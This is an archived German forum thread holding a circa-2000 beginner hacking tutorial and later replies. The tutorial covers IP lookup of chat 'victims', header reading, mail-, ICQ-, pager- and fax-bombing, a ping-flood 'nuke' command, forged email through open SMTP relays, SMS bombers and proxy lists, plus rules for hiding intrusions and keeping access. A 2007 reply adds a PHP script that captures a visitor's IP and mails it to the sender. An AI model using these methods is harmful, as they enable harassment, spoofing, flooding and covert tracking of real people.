PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : hacken hacken und nochmals hacken



HurricanX
11.08.2004, 20:06
NHG - www.Hacken.de.vu

Dieses Tutorial:
Geschrieben von: Score
Begin: 5.1.2000
Ende:10.1.2000

Inhalt:
1. Hacking Regeln
2. Faq der Hack- / Crackbegriffe
3. Sniffing / IPs
4. Bombing
5. Exploits
6. Hackergesetze und Ethik
7. Anoyme Mails
8. Portliste (die wichtigsten Ports)
9. Sms-Bomber und Server
10. Ein Proxy-Server-Liste

So. Dies ist mein erstes Tutorial. Lest euch die Sachen aufmerksam durch und probiert alles aus (natürlich an euren eigenen Sachen oder mit ausdrücklicher Genehmigung der Opfer). Aber wenn ihr damit Scheisse baut, bin ich nicht dafür verantwortlich!
Wenn ihr irgendwelche Fragen habt, oder noch etwas lernen wollt und dazu nur noch nen Tutorial braucht, schreibt mir ne Mail und ich werde es in mein nächstes Tutorial stellen.
Also viel Spass...

PS.: Das Motto dieses (und allen anderen Tutorials von mir) und meiner Site ist es, dass jede Sache, die beschrieben, erklärt oder zum Download angeboten wurde von einer entweder mit bekannten Person oder von mir selber auf Funktions-Fähigkeit bei einem betriebssystem von Unix-System oder Windows ab Version 98. Alles, was beschrieben (etc) wird, wurde ERFOLGREICH gestestet. Es kann sein, dass, wenn ihr dieses Tutorial lest, die Bugs der jeweiligen Programme etc. schon behoben wurden. Dafüf kann ich dann ja nichts. Aber sicher ist, dass zu der Zeit, in der das Tut geschrieben wurde, alles funktioniert hat.


1. Hacking Regeln
a. Beschädige niemals ein System. Das kann dich nur in Schwierigkeiten
bringen.

b. Verändere niemals System Dateien, außer die, die du brauchst, um
sicherzustellen, daß du nicht erwischt wirst, und die die dir in
Zukunft Zugang zu diesem Computer geben.

c. Gib niemals Informationen über deine Hacking Projekte jemandem, dem
du nicht bei deinem Leben vertraust.

d. Wenn du etwas auf BBS's (Bulletin Board Systems / Boards / Foren) veröffentlichst,
gehe nicht zu sehr in die Tiefe bei deiner Beschreibung der Hacking
Projekte. BBS's KÖNNEN vom Gesetz beaufsichtigt werden.

e. Benutze niemals echte Namen oder Telefonnummern wenn du etwas auf
BBS' veröffentlichst.

f. Hinterlasse niemals deinen Nicknamen
auf einem System, in das du dich gehackt hast.

g. Hacke NIEMALS Regierungs Computer.

h. Sprich niemals über Hacking über deine private Telefonleitung.

i. Sei paranoid. Verstecke all dein Hacking Material in einem sicheren
Platz.

j. Um ein echter Hacker zu werden, muß du hacken. Du kannst nicht nur
herumsitzen und deine Zeit mit lesen und BBS's verbringen. Das ist
nicht das, worum es beim Hacken geht.


2. Faq der Hack- / Crackbegriffe

Nuken
- (Cracken) Nuker sind Programme, die andere Computer oder Server mit Anfragen, oder Pings überfüllen und somit dessen Absturz bewirken. Mit Pings nennt man diese Art von Nuken ICMP-Bombing. Bekannt wurde zuletzt WinNuke bei dem man dank eines Fehlers von Windows 95 mittels IRC den Rechner des Chat-Partners abstürzen lassen kann.

Phreaken
- Phreaken hat nichts mit dem Wort Freak zu tun. Phreaker sind vielmehr Leute, die sich nahezu perfekt mit Telefonen und allem, was dazu gehört auskennen. Sie können zum Beispiel kostenlos telefonieren. Es gibt Beschreibungen im Internet, wie man so etwas macht. Diese Beschreibungen nennen sich „Farb-Box“ - Nach Farben benannte Boxen, die jeweils eine bestimmte Funktion haben. Kostenlos telefonieren ist
z.B: BlueBoxing

Portscanner
Scannt einen Computer nach offenen Prots um bestimmte Aktionnen zu starten.

Sniffen
Sniffen heißt, etwas herausfinden bzw. „schnüffeln“. Z.B.: IP-Sniffing bedeutet, das man die IP von jemandem herausfindet.

Spoofen
Etwas verfälschen. Z.B.: IP Spoofing ist seine IP verfälschen. Auch sehr bekannt, das DNS-Spoofing, das bedeutet, dass man seinen Rechnernamen fälscht. Auch bekannt ist E-Mail Spoofing. Hier werden E-Mails mit falscher Adresse, Namen etc. verschickt. Achtung: Anfänger sind leicht zu orten, da sie ihre IP und ihren Rechnernamen meistens nicht mit spoofen. Also dran denken!

Telnet
Telnet ist kein Begriff, sondern ein Layer von TCP/IP - von Microsoft (bei Windows dabei) - der zur Kommunikation zwischen Netzwerken dient.

Trojaner
Sind Programme, mit denen man in Freamde Computer eindringen kann und dort alles verändern kann. Trojaner sind Crack-tools. Berühmte Besipiele sind Sub7 (mein persönlicher Favorit - aufpassen beim Scannen, wenn ihr FreeNet benutzt *fg), BO2k (Back Orifice 2000) und Netbus (Diese Angriffe nennt man „Data Driven Attacks“.

Data Driven Attack
Ein angriff, der nicht dierekt erfolgt, sondern getarnt in Mitten scheinbar hermloser Dateien. Beispielsweise mit einem Trojanischem Pferd (Trojan Horse).

Bombing
Unter Bombing kann man mehrere Dinge verstehen. Einmal das E-Mail bombing, dass in verschiedene Teile aufgeteilt ist. Es gibt Bombing mit einer Datei, die man schickt und die sich dann auf dem Server automatisch vergrössert und es gibt Bombing (die bessere und belibtere Form), indem man 1000e Mails an eine Adresse schickt und somit seinen Computer zum Abstürzen bringt oder seinen Mail-Account automatisch löscht ;-). Noch eine Art von Bombing ist Nuken. Wers glaubt oder nicht. Nuken ist oben beschrieben. ICMP-Bombing unten.

Anonym-Mails
Wollte hier nur mal kurz sagen, dass anonyme Mails keine „gespooften“ Mails sind.

FTP Bouncing
Das Umleiten von FTP-Downloads mit Hilfe kleiner Scripte, die auf den FTP-Server geladen werden.

ICMP-Bombing
Hier wird das ICMP (Intenet Control Message Protocol) um einen Server auszuschalten bzw. zu Nuken (oben beschrieben). Man ping hiermit einen Server mit Anfragen voll, bis er überlastet ist und abkratzt. Es wird aber auch in friedlicher Absicht z.B.: beim Ping verwendet und erfordert kein Einloggen.

IP Splicing
Eine bestehende Internet-Verbindung wird abgefangen und der Angreifer schlüpft in die Rolle des bereits zuvor autorisierten Benutzers - wird auch IP-Entführung genannt.

Network worm / Wurm
Ein Programm, das ein Netzwerk als Überträger verwendet, um ein anderes System zu stören. Solche Würmer kriechen gerne von Netzwerk zu Netzwerk.

Racing Authentication
Der Netzwerkverkehr zwischen User und Host wird beim Einloggen überwacht und Username sowie Passwort nachgetippt. Den letzten Buchstaben rät der Hacker und tippt ihn schneller als der wirkliche User (nicht wirklich gut…)

RIP-Attacks
Hier wird das RIP (Routing Information Protocol) verwendet, um Routen im Internet / Intranet zu verändern. So kann etwa der Datenstrom eines Mail-Servers auf den eigenen Server umgeleitet und dort in Ruhe studiert werden.

Trojanische Pferde / Tronjan Horses
Das Trojanische Pferd, ein Verwandter des Virus, ist ein gefährliches Programm mit harmloser Erscheinung. Bekannt wurde das Trojan Horse durch den kürzlichen Password-Hack zweier Jugendlicher bei T-Online durch ein Trojan Horse.

FTP-Hacker
Tja , wie beschreibt man einen FTP-Hacker? In einfachem Deutsch würde es Homepage Hacker heissen . Also jemand, der eine Internetseite mit einem Dictionary oder Bruteforce Passwortcracker (z.B.: Unsecure oder Brutus) knackt . Um dann Daten zu verändern oder seinen Freunden ihr Passwort mailt . Damit sie dumm glotzen . Es gibt auch andere, einfachere und schnellere Methoden um eine Homepage zu hacken, die allerdings sehr selten funtzen .

Virii (Viren)
Ein Virus ist ein unabhängiges Programm, daß sich selbst reproduziert. Es kann
sich an an andere Programme anhängen, es kann sich selbst kopieren (wie die
Companion Viruse). Es kann Daten beschädigen, umschreiben, oder unleserlich
machen, oder die Performance deines Computers verschlechtern, indem es sehr
viele Systemrecourcen, wie z.B. Festplattenspeicher oder RAM Speicher, verwendet.
Manche Anti-Virus Programme finden viele Viren, aber kein Programm erkennt alle.
Kein Virus Scanner kann vor allen Viren schützen, egal ob bekannt oder unbekannt,
egal od jetzt oder in der Zukunft. (THX EOF)

Nerd (s)
Nerds sind in erster Linie Freaks. Sie sind Computer bzw. Hack-Gurus und wissen ziemlich viel übers Hacken etc. Mehr will ich dazu jetzt (aus Zeitgründen) nicht sagen.

Hacker / Cracker
Hacker:
Hacker sind Leute, die sich Zugang zu Daten verschaffen. Sie sind dafür, dass es im Internet keine Geheimnisse gibt. Sie hacken Websites oder finden besondere Dinge heraus und geben diese preis, damit andere auch an diese Informationen kommen. Hacker zerstören nichts und benutzen auch keine Tools, wie Nuker, Mailbomber Flooder etc.
Cracker:
Cracker sind Leute, die anderen Eigentum zerstören, Dinge kopieren oder einfach nur Scheisse bauen. Sie verarschen Leute, zerstören ihre Accounts / Computer mit Tools, wie Nukern. Cracker werden weltweit von echten Hackern verachtet und von den Medien und „Outsidern“ mit Hackern verwechselt, was diese nicht unbedingt freut.
Ps.: Alle Hacker beutzen oder haben wenigstens schon einmal etwas wie einen Nuker, Flooder oder Bomber ausprobiert. Da diese Dinge meistens eh nicht funktionieren, ist das aber unwichtig ;-).



3. Snffing

3a IP-Sniffing
1) Ips kann man über mehrere Wege herausfinden. Einer davon ist, es über das Subnet zu tun.
OK. Geh in einen Chat (IRC) z.B.: Ice Spin (gibt’s umsonst für Homepages) und gib den Befehl /whois USERNAME direkt in den Chat ein. Diese musst du dir merken oder aufschreiben um eine Anfrage zu starten
(z.B.: bei Denic: <http://www.denic.de/servlet/Whois> ). Das Ergebnis, dass man bekommt ist nur eine Range von Ips, die man erst scannen muss. Scanner findest du auf fast jeder vernünftigen Hacker-Site. Such einfach nen bissel und frag nach und du wirst fündig werden.

2) Der 2. Weg ist über ICQ.
Du musst deinem Opfer eine Nachricht schicken und gleich danach in der schon geöffneten MS-DOS Eingabeaufforderung netstat -a eingeben.
Nach einer kurzen Zeit siehst du folgendes zu sehen:



Wie man sieht ist die IP des Opfers 205.188.5.173

Wenn man keine IP am Anfang zu sehen bekommt, muss man zu dem „Hergestellt“-Server pingen. Z.B.: ping p3EE2F9C8.dip.t-dialin.net:2005 (dip.t-dialin ist immer T-Online)
(das war ein dummes Besipiel) - Dann erhält man die IP des Users.

Falls das bei euch nicht funktioniert:

Probiert es mit Netstat -n aus. Da werden alle Ips ausgegeben. Netstat -a ist für Computernamen!
Habt ihr T-Online?? Geht übers DFÜ-Netwerk ins Netz. Ansonsten Funzts nicht!
Oder ihr besorgt euch T-Online 3.0
(Ich hab zwar kein Tonnline, aber weiß es trotzdem ;-) )


3) Der 3. und letzt Weg (in diesem Tutorial) ist das Header-Lesen
Hier kommt erst mal die erhaltene Mail (umgeändert)

From: Held <fooha@ifi.foobar.no>
Date: Tue, 2.1 2000 18:09:53 GMT
To: hacker@techbroker.com

Received: by o200.fooway.net (950413.SGI.8.6.12/951211.SGI) for techbr@fooway.net id OAA07210; Fri, 11 Apr 1997 14:10:06 -0400
Received: from ifi.foobar.no by o200.fooway.net via ESMTP (950413.SGI.8.6.12/951211.SGI)
for <hacker@techbroker.com> id OAA18967; Fri, 11 Apr 1997 14:09:58 -0400
Received: from gyllir.ifi.foobar.no (2234@gyllir.ifi.foobar.no [129.133.64.230]) by ifi.foobar.no with ESMTP (8.6.11/ifi2.4)
id <UAA24351@ifi.foobar.no> for <hacker@techbroker.com> ; Fri, 11 Apr 1997 20:09:56 +0200
From: Vegbar Fubar <fooha@ifi.foobar.no>
Received: from localhost (Vegbarha@localhost) by gyllir.ifi.foobar.no ; Fri, 11 Apr 1997 18:09:53 GMT
Date: Fri, 11 Apr 1997 18:09:53 GMT
Message-Id: <199704111809.13156.gyllir@ifi.foobar.no>
To: hacker@techbroker.com <mailto:hacker@techbroker.com>

Wie ich den Header finde.
Bei den verschiedenen Anbietern (wenn der Header angezeigt wird, ist er immer unten hinter der Mail zu finden):
Aol - Wird angezeigt
Compuserve Glück gehabt, Compuserve zeigt euch automatisch den Header
Microsoft Outlook Die Mail anklicken und dann auf Datei \ Eigenschaften \ Details klicken
Netscape Navigator Einfach die Mail markieren, dann auf Ansicht \ Seitenquelltext klicken
Netscape Communicator Einfach die Mail markieren, dann auf Ansicht \ Seitenquelltext klicken.

Und hier die Erklärungen:


From: Vegbar Fubar <fooha@ifi.foobar.no>
- hier findet ihr Informationen über den Absender der E-Mail wie eingetragenen Namen im Mail Programm sowie die E-Mail Adresse

Date: Fri, 11 Apr 1997 18:09:53 GMT
- in dieser Zeile findet ihr das Datum und die Uhrzeit, wann die Mail abgeschickt wurde

To: hacker@techbroker.com
- in dieser Zeile seht ihr, an wen die E-Mail gerichtet ist (hier seht ihr nur die E-Mail Adresse, keinen Benutzernamen !!!)

Received: by o200.fooway.net (950413.SGI.8.6.12/951211.SGI) for techbr@fooway.net id OAA07210; Fri, 11 Apr 1997 14:10:06 -0400
- hier findet ihr Informationen darüber, von welchen POP Server ihr euch die E-Mail geholt habt,
das wäre in diesem Fall o200.fooway.net,
welche Mailsoftware auf dem Server aktiv ist (inkl.Versionsnummer), das Datum und die Uhrzeit

Received: from ifi.foobar.no by o200.fooway.net via ESMTP (950413.SGI.8.6.12/951211.SGI)
for <hacker@techbroker.com> id OAA18967; Fri, 11 Apr 1997 14:09:58 -0400
- hier findet ihr den Computernamen (ifi.foobar.bo) der die Mail an den Server geschickt hat
(o200.fooway.net) und an wen die E-Mail adressiert ist

Received: from gyllir.ifi.foobar.no (2234@gyllir.ifi.foobar.no [129.133.64.230]) by ifi.foobar.no with ESMTP (8.6.11/ifi2.4)
id <UAA24351@ifi.foobar.no> for <hacker@techbroker.com> ; Fri, 11 Apr 1997 20:09:56 +0200
- diese Zeile enthält, das der Computer ifi.foobar.no die E-Mail von einem anderen Computer (gyllir.ifi.foobar.no) erhalten hat
nach dem Computernamen gyllir.ifi.foobar.no findet ihr eine IP Adresse 129.133.64.230
aber warum findet ihr nach ifi.foobar.no keine ???

um dieses Phänomen zu lösen gehen wir wie folgt vor:
macht einen NSLOOKUP (bekommt ihr überall als Programm) auf ifi.foobar.no
die Antwort sollte so aussehen:
Server: Fubarino.com
Address: 198.6.71.10
Non-authoritative answer:
Name: ifi.foobar.no
Address: 129.133.64.2

Aber was soll uns das sagen ???
Ganz einfach, der Computer ifi.foobar.no hat sich mit dem Server Fubarino.com
verbunden und von dort aus die E-Mail geschickt

Aber warum einmal .no und einmal .com ???

Ebenfalls ganz einfach: der Computer ifi.foobar.no scheint ein Norwegischer Computer zu sein,
der sich mit dem amerikanischen Server
verbunden hat um von dort aus die Mail zu schicken

From: Vegbar Fubar <fooha@ifi.foobar.no>
- hier können wir erkennen, das der Absender der E-Mail "Vegbar Fubar" ist
(jedenfalls hat er sein Mailprogramm darauf eingerichtet)
und das die Absenderadresse "fppha.ifi.foobar.no" ist

Received: from localhost (Vegbarha@localhost) by gyllir.ifi.foobar.no ; Fri, 11 Apr 1997 18:09:53 GMT
- Der Computer "gyllir.ifi.foobar.no" hat die E-Mail von "Localhost" (einem lokalen Rechner) erreicht
diesen Computer können wir per Telnet abfragen, um zu sehen welches System der Computer betreibt

telnet gyllir.ifi.foobar.no
ebenfalls sehen wir hier ein Datum und eine Uhrzeit, welche besagt wann der Computer die E-Mail erreicht hat

Date: Fri, 11 Apr 1997 18:09:53 GMT
- hier erkennen wir, das Datum und die Uhrzeit, wann uns die E-Mail erreicht hat

Message-Id: <199704111809.13156.gyllir@ifi.foobar.no>
- aus der Message ID können wir das Datum (1997 April 11) entnehmen und die Zeit (1809=18:09 Uhr)
und 13156 identifiziert denjenigen,
der die E-Mail abgeschickt hat (dies findet nur aus Sicherheitsgründen des Mail-Servers statt)

To: hacker@techbroker.com
- in der letzten Zeile des Headers sehen wir unsere eigene E-Mail Adesse,
d.h. welche Empfängeradresse der Absender eingetragen hat
Special THX an Britnackt


4) Noch ein kurzer Weg ist über einen IP-Trojaner
Man kann auch einfach einen IP Trojaner beim anderen einspielen. Der Trojaner schickt einem dann immer eine Mail mit der IP wenn das Opfer Online geht.

5) Die fünfte Methode wäre, einfach zu fragen, aber das machen nicht alles Leute.
Nur Lamer und Leute, die vom Hacken keine Ahnung haben oder die denken, dass du nichts kannst bzw. dieses Tutorial nicht gelesen hast ;-)
Wickel sie ein bisschen ein und denk dir nen gute, scheinheiligen, hinterlistigen Weg ein, um an die IP zu kommen.
Wenn du einen hast, schreib ihn doch in mein Forum oder in mein G-Book (würde mich freuen)


3b Provider Sniffing
Provider Sniffing heist, den Provider (Internetanbieter) einer bestimmten Person zu ermitteln.
Das einzige, was man dazu braucht, ist die IP des Opfers (ist ja oben beschrieben, wie du die herausbekommst). Du brauchst nicht die ganze IP, sondern nur bis zum Subnetz
(normale IP: 152.207.132.105 - das was du brauchst: 152.207.x.x [Dieses Beispiel wäre eine dynamische AOL-IP])

Wenn du die IP hast, gibt es 2 Wege, den Provider zu ermitteln:
Anhand von einer IP-Range oder mit Whois-Anbietern.

Wir beginnen mit den Whois-Anbietern, wobei ich diese Methode eigentlich nicht so gut finde. Egal...
Hier sind ein paar Anbieter:

* <http://www.denic.de/servlet/Whois>
Wir starten bei diesem Dienst unsere Anfrage sollten wir vermuten, daß die Person aus Deutschland kommt
* <http://www.arin.net/whois/arinwhois.html>
Wir starten bei diesem Dienst unsere Anfrage sollten wir vermuten, daß die Person aus Amerika kommt
* <http://www.ripe.net/db/whois.html>
Wir starten bei diesem Dienst unsere Anfrage sollten wir vermuten, daß die Person aus Europa (allegmein) oder Afrika kommt
* <http://www.apnic.net/reg.html>
Wir starten bei diesem Dienst unsere Anfrage sollten wir vermuten, daß die Person aus Asien oder der Pazifikregion kommt

Wenn wir die Abfrage gestartet haben, haben wir alle Informationen, die wir brauchen.
Übrigens kann man bei ripe.net auch nach Nachnamen suchen!
THX an Cyberdemon 98

Als 2. kommen die etwas sicheren IP-Ranges.
Das ist eine Liste, mit sehr vielen Ips und dem dazugehörigen Provider.
Auf meiner WebSite (die URL steht am Ende des Tutorials) findet ihr mehrere solcher Listen (superlang) und wir sammeln auch auf der Site.
BITTE HELFT DIE LISTE NOCH ZU ERWEITERN!!! (auf unserer Site)
Danke


Was man alles mit einer IP anfangen kann
Mit einer IP kannst du eine ganze Menge Sachen machen.
Ich werde hier aber nur ein paar aufzählen:

1. Man kann eine Person Nuken (das machen aber nur Cracker und heutzutage geht das eh fast gar nicht mehr)
2. Mann kann einen Trojaner aktivieren
3. Man kann die Port abhören (Portliste ist weiter unten)
4. Man kann den Provider herausfinden (ein weiter hoch)

Es gibt noch viel mehr Möglichkeiten die ich hier aber nicht alle aufzählen möchte...

Adress-Sniffing
Man kann auch noch die Adresse herausfinden, indem vorrausgesetzt wird, dass das Opfer eine originale Domain hat (z.B.: .de / .net / .org / .com / .at /.ch etc...)
Achtung: Es gibt anbieter wie AnonymDomain.de oder Namezero.com, die diese Daten nicht preisgeben. Wenn euer Opfer dort angemeldet ist, habt ihr pech. PS.: Dies sind Anbiter, die umsonst Domains vergeben!
Also ihr geht zu einem Whois service (z.B.: Ripe.net - Ist in jeder Whois-hinsicht der beste Service) und gebt den Domainnamen ein. Schon habt ihr den Namen bzw. die Adresse. So kann man dann noch kombinieren und zum Beispiel die Telefonnummer herausfinden. Die Erklärung mit einem grösseren Tutorial zu diesem Thema gibt’s auf unserer Site (die URL steht am Ende des Tuts)


4. Bombing
Bombing kann man in vielen Variationen machen.
Ich werde hier einige, die auch funktionieren! Erläutern.
Bombing ist eigentlich nur für Cracker, aber zur Not kann das auch ein Hacker machen, solange er alles selber macht und nicht irgendwelche Tools aus dem Internet, die sowieso nicht funzen, benutzt.

Also. Erstmal:
Wie mache ich mir meinen eigenen Mailbomber ohne programmieren zu müssen?
Ganz einfach!
Du machst dir einen Account (nicht bei Web.de!! Die haben ein Mail-Verschick-Limit und Yahoo is auch scheisse)
Bei einem Free-Mail-Anbieter.
Dann öffnest du den Editor und gibt’s einmal die Mail-Addy deines Opfers an. Die kopierst du ganz oft hintereinander in den Editor und am Ende kopierst du das in die Empfänger-Zeile rein. Achtung: Achte dareauf, dass du bei manchen Anbietern Kommas und Anführungsstrichelchen zwischen den Addys eingeben musst!
Also. Wenn du es jetzt reinkopiert hast, schreibe noch nen Text dazu und schicke ab.
Es dauert genauso lange, wie eine einzige Mail abzuschicken, weil der Server sie vervielfacht und nicht dein Computer... Also eigentlich ist der Server schuld ;-)

ICQ zubomben
Ist total einfach. Du musst einfach satt der E-Mail-Adresse das hier eingeben:

ICQUIN@pager.mirabilis.com <mailto:ICQUIN@pager.mirabilis.com>

Die ICQUIN muss natürlich ersetzt werden.

So.. Das wars.
Aber was ist, wenn dein ICQ auf diese Art und weise zugebombt wird?
Dagegen gibt es dieses Mittel:
Starte ICQ und führe das aus bzw. übernimm die neuen Einstellungen:
- ICQ
- Security & Privacy
- Do not accept EmailExpress Messages

Scall und Quix (die veralteten Dinger) zubomben
Es ist das gleiche Prinzip wie bei ICQ.
Man muss nur statt der Mail-Addy

Scall-Nummer@Scall.de <mailto:Scall-Nummer@Scall.de>

Eingeben

Bei Quix läuft es wieder ähnlich ab:
Man setzt nämlich die Empfänger-Adresse aus Nummer und Host-Domain zusammen.
Die Rufnummer des Quix inkl. Vorwahl 0165-6-1234567
Dann lautet die E-Mail-Adresse des Empfängers:

1234567@quix-it.de <mailto:1234567@quix-it.de>

Einfach abschicken und schon kann man dem Quix auf wiedersehen sagen...

Fax-Bomben
Gebt hier als E-Mail-Adresse dies ein:

Remote-printer.NAME/ORT@49yyyyxxxxxx.iddd.tpc.int <mailto:Remote-printer.NAME/ORT@49yyyyxxxxxx.iddd.tpc.int>

NAME Name des Emfängers
ORT Ort des Empfängers
y Vorwahl ohen 0
x Faxnummer

So... Nur noch den hübschen Send-Button drücken und ab geht die Post...

Ach ja... Für alle Cracker, die nen Mailbomber beutzen wollen, noch nen paar gute Server:

mail.microsoft.de
mail.microsoft.com
mail.ccc.de
mail.cityweb.de

(kein garantie, dass die noch funzen - Ich benutze so was nicht)

5. Exploits

Exlpoids sind kleine Programme, die Fehler auf Servern ausnutzen, um sie zu übernehmen. Es gibt 2 Arten von Exploits:

Local Exploits
Das bedeutet das man schon einen Account auf diesem Rechner haben muss und dann dort den exploit ausführt.

Remote-Exploits
Mit dieser Sorte bekommt man von seinem eigenen Rechner Zugriff auf den anderen ohne einen Account auf auf dem Zielrechner zu haben.

Exploids findet man hauptsächlich auf diesen Sites:
<http://packetstorm.securify.com>
<http://www.rootshell.com>
<http://www.rootsecure.de/inside/archive/exploits/exploits.html> (Rootsecure)
<http://www.rootshell.com>
<http://www.secureroot.com>

Exploits findet man meistens nur als Text-File. Man muss sie noch komplieren.
Sie sind meistens mit C geschrieben, also musst du einen C-Compiler haben und auch nen bissel damit umgehen können.


6. Nuking

Nuking heisst, fremde Computer z.B.: zuzupingen oder mit Anfragen zu überfluten, so dass dieser wegen Überlastung abkratzt.

Winnuke funzt nur bei win95. Da war ein Bug drin, auf Port 139 (Netbios Port), und zwar kann jedes Ping packet nur so uns so (glaube 650005 Bit) groß sein, sonst wird es aufgeteilt in mehrere, Microsoft hatte allerdings ein fehler gemacht, sodass mehr ging auf dem Port, und so der Rechner abschmierte..

Er führt nur diesen Befehl aus:
ping -n 650010 xxx.xxx.xxx.xxx

Aber benutzt diese Tools nicht, da Leute, die diese Dinge benutzen und nicht programmieren Lamer bzw. Script Kiddies sind.

Hackergesetze und Ethik
Gesetze (Bin nicht für eventuelle Fehler verantwortlich):

Das ist ein Auszug aus den Bundesgesetzblatt Nr. 21, 1986

§202a Ausspähen von Daten:
(1) Wer unbefugt Daten, die nicht für ihn bestimmt und gegen unberechtigten Zugang besonders gesichert sind, sich einem anderen verschaft, wird mit Freiheitsstrafe bis zu drei Jahren oder mit Geldstrafe bestraft.
(2) Daten im Sinne des Absatzes 1 sind nur solche, die elektronisch, magnetisch oder sonst nicht unmittelbar wahrnehmbar gespeichert sind oder übermittelt werden.

§263 Computerbetrug:
(1) Wer in der Absicht, sich oder einem Dritten einen rechtswiedrigen Vermögens- vorteil zu verschaffen, das Vermögen eines Anderen dadurch beschädigt, dass er das Ergebnis eines Datenverarbeitungsvorgangs durch Verwendung unrichtiger Einwirkungen auf den Ablauf beinflusst, wird mit Freiheitsstrafe bis zu fünf Jahren oder mit Geldstrafe bestraft.

§303a Datenveränderung:
(1) Wer sich rechtswiedrig Daten (§ 202a Abs. 2) löscht, unterdrückt, unbrauchbar macht oder verändert, wird mit Freiheitsstrafe bis zu zwei Jahren oder mit Geldstrafe bestraft.
(2) Der Versuch ist strafbar.

§303b Computersabotage:
(1) Wer eine Datenverarbeitung, die für einen fremden Betrieb, ein fremdes Unternehmen oder eine Behörde von wesentlicher Bedeutung ist, dadurch stört, dass er...
1. eine Tat nach $ 303a Abs. 1 begehrt oder
2. eine Datenverarbeitungsanlage oder einen Datenträger zerstöhrt, beschädigt, unbrauchbar macht, beseitigt oder verändert, wird mit einer Freiheitsstrafe bis zu fünf Jahren oder mit Geldstrafe bestraft.
(2) Der Versuch ist strafbar.

Hackerethik
Hier ist die Hackerethik des berühmtesten Hack-Clans deutschlands (CCC - Chaos Computer Club) und aller anderen Hacker auf dieser Welt.

1. Der Zugang zu Computern und allem, was einem zeigen kann, wie diese Welt funktioniert, sollte unbegrenzt und vollständig sein.
2. Alle Informationen müssen frei sein.
3. Mißtraue Autoritäten - fördere Dezentralisierung.
4. Beurteile einen Hacker nach dem, was er tut und nicht nach üblichen Kriterien wie Aussehen, Alter, Rasse, Geschlecht oder gesellschaftlicher Stellung.
5. Man kann mit einem Computer Kunst und Schönheit schaffen.
6. Computer können dein Leben zum Besseren verändern.
7. Mülle nicht in den Daten anderer Leute.
8. Öffentliche Daten nützen, private Daten schützen.

7. Anonyme Mails

OK. Um anonyme Mails zu verschicken muss man folgendes tun.
Ich werde erst das schreiben, was ihr machen müsst und unten folgt die Beschreibung:

[Start | Ausführen]
<enter>
telnet www.eurocounter.com 25
<enter>
helo homo.de
<enter>
mail from:herbert@homo.de <mailto:herbert@homo.de>
<enter>
rcpt to:gerd@homo.de <mailto:gerd@homo.de>
<enter>
data
<enter>
Subject: Hallo Herbert!
<enter>
Na wie geht's?
<enter>
.
<enter>
quit
<enter>

Erklärung:
Also. Als erstes startet ihr Telnet.

telnet www.eurocounter.com 25 Hiermit konnektiert ihr den Mail-Server von
Eurocounter.com. Die 25 ist die
Portnummer (SMTP bzw. Simple Mail Transmit
Protocol)
helo hacken.de Erstmal "Hallo" sagen...
mail from:du@hacken.de <mailto:du@hacken.de> Ihr sagt dem Server „eure“ Absender-Adresse
rcpt to:arsch@succa.de <mailto:arsch@succa.de> arsch@succa.de <mailto:arsch@succa.de> sollte mit der Mail-Addy eures
Ofpers ausgetauscht werden. Wenn
ihr jetzt die Meldung "Relaying denied"
bekommt, müsst ihr einen anderen Server nehmen.
data ... *fg
Subject: Hallo Herbert! Hier müsst ihr das Subjekt der Nachreicht angeben.
Na wie geht's? Hier kommt jetzt eure Nachricht hin. Ihr könnt alles
schreiben und auch Enters benutzen, aber ihr dürft
keinen Punkt (.) setzen!!!
. <-- Das ist ein Punkt. Der muss ganz allein in der
Zeile stehen.
quit beendet das Ganze dann schließlich.


Ok, das wars. Fragen dürften eigentlich nicht auftreten aber wenn doch is ja immer noch das Forum auf unserer Site da ;-).
Die URL steht (wie immer) unten...

Hier noch ne Liste von Servern, die Fake-Mails „erlauben“:

mail.subaru.de
www.eurocounter.com
utmjb.utm.my



8. Portliste

Hier findet ihr eine Liste der wichtigsten Ports.
Eine Liste aller Ports findet ihr auf Hacken.de.vu

9 -> Discard
15 -> Netstat
19 -> Chargen
21 -> FTP
23 -> Telnet
25 -> SMTP
39 -> RLP
53 -> Nuke
67 -> Boot
79 -> Finger
80 -> HTTP
87 -> LinK
110 -> POP3
113 -> Ident
119 -> Nntp
129 -> Nuke
137 -> Nuke
138 -> Nuke
139 -> Nuke
513 -> Login
515 -> Pkill
533 -> Netwall
560 -> Rmonitor
561 -> Monitor
1080 -> Firewall Port
4000 -> ICQ
5580 -> mil HTTP
8080 -> HTTP, mil HTTP

9. Sms-Bomber und Server

Ok. Hier ist eine (leider ziemlich kleine) Liste von Sms-Bombern, die bei mir schon mal gefunzt haben:

SMS-Bone (v1.3) - Kein Passwort?? Also der Beste.
SMS-Samurai - Hat in V1.141 auch nen Passwort
Fluxx - Is aber scheisse, solange man das Passwort nicht hat…

SmS-Server:

Sms-Kostenlos.de
Lycos.de
Mobinding.de
Free-sms.com
Inhaltsverzeichnis.de
Handy-Land.de
Warrant-investor.de
Mobidig.de
Yoody.de
Spray.net
Startseite.de


10. Eine Proxy-Server-Liste
Da es immer neue Proxies geben wird und immer mehr Proxies verschwinden, habe ich hier nur Links zu Seiten mit guten Proxy-Links und Proxy-Tests gemacht.

http://proxy.nikto.net/anon_list.htm
http://www.spaceproxy.com/
http://netspy.ukrpack.net/
http://tools.rosinstrument.com/proxy/proxies.htm
http://members.tripod.com/burn77/proxies.html
http://www.subseven.de/firewallp.html
http://www.multimania.com/nohack/proxis.html
<http://www.worldhackerz.org/top200fastestproxies.txt>

pFanDaSSi
05.11.2007, 21:47
Hi und zwar schreibst du hier was um das icq zuzubomben...

ich checke das mit der email addy nich..wie soll das denn gehn bitte??? ;)

bitte um antwort...

meckl
06.11.2007, 06:57
mit einem mailbomber...
einfach das wie oben beschrieben eingeben, und los gehts...
;)

VincentSX
06.11.2007, 07:36
lölz...
Naja ein wenig alt das tut würd ich sagen....So manches was darin steht dürfte nicht mehr funktionieren...
Naja Trotzdem happy share ;)

Masterchief
18.11.2007, 13:05
Man kann die ip auch einfach per php scribt rausfinden und sich die per email schicken lassen
einfach die php auf nen ftp server packen victim den link schicken un schon hat mans ^^

<?php
$Empfänger = "DeineMail@Mail.de";
$Betreff = "IP Adresse";
$IpAdresse = $_SERVER['REMOTE_ADDR'];
$nachricht .= "Angeforderte IP-Adresse: ".$IpAdresse."\n";
mail ($Empfänger, $Betreff, $nachricht)
?>

nurnoch e mail adresse ersetzten ;)